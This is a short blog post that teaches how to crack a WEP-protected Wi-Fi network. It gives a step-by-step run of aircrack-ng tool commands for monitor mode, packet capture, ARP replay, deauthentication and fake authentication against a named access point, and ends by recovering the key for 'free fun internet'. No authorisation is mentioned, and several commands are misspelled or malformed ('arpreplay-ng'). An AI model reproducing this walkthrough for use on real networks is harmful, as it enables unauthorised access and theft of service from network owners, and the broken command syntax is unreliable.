Menu
 

Hi all After a long day back to another exciting post so this time we are going to learn how to crack wep protected wifi network .
WEP Protected wifi network are not very strong in nature it can be easily be broken by any guy who has good idea on wifi things,so lets go directly into the tutorial it self i am not going to make you boar with old theory.

first of all we need a back track machine you can easily make it live boot using pendrive,DVD after entering into the backtrack /kali terminal look for your network card status if it is up and running you can easily know by typing ifconfig on terminal.
Now make you laptop device wireless n/w that is wlan0 in monitor mode (this mode enable you to see/capture the data packet that are floating on air )
Command to do that is : airmon-ng start wlan0 this will create mon0 interface for monitor mode
now to see the data packet those are available on air using mon0 interface the command is
airodump-ng mon0 this will give you all packets those are available around you .
So as we can see MGMNT is wep on channel 11 protected and we want to hack it/ break the key so lets do it.
you can set you mon0 on that specific channel so to do that you can use these command
iwconfig mon0 channel 11 (this is needed as our wifi interface can do better communication over same channel )
next write all the packet into a file which we will utilize for cracking
airodump-ng --channel (channel numbe here its)11 (interface)mon0 --write name(anyname) --bssid bssid(Access point you want to hack bssid).
After that is done you have to populate data packet from that Access point which can be done using arpreplay
command will be aireplay-ng --arpreplay -e MGMNT mon0
now next point how do we get arp pakcet to do the replay action that can easily be done using an deauth packet or showing a fake connection (if no devices are connected to that access point)
Deauth (open a new terminal type ) arpreplay-ng --deauth 0 -e MGMNT mon0
other wise you can show fake auth (if no devices are connected to access point )
arpreplay-ng --fakeauth 0 -e MGMNT mon0
once any client connect to access point MGMNT your arp replay will start showing you action by pumping numerous data packet .
so finally after collecting more that 22K data packet that is enough to crack any wep encryption (coz of weak IV if you wann know technical details you can as me mail or chat) ..using aircrack again the command is simple
aircrack-ng filename-01.cap
that will display your cracked key which you can use later to connect to that access point and then have free fun internet :).
do comments your query if you stuck any where we are happy to help you and thanks

Post a Comment

Feel Free To Ask Your Query we Love To Answer

 
Top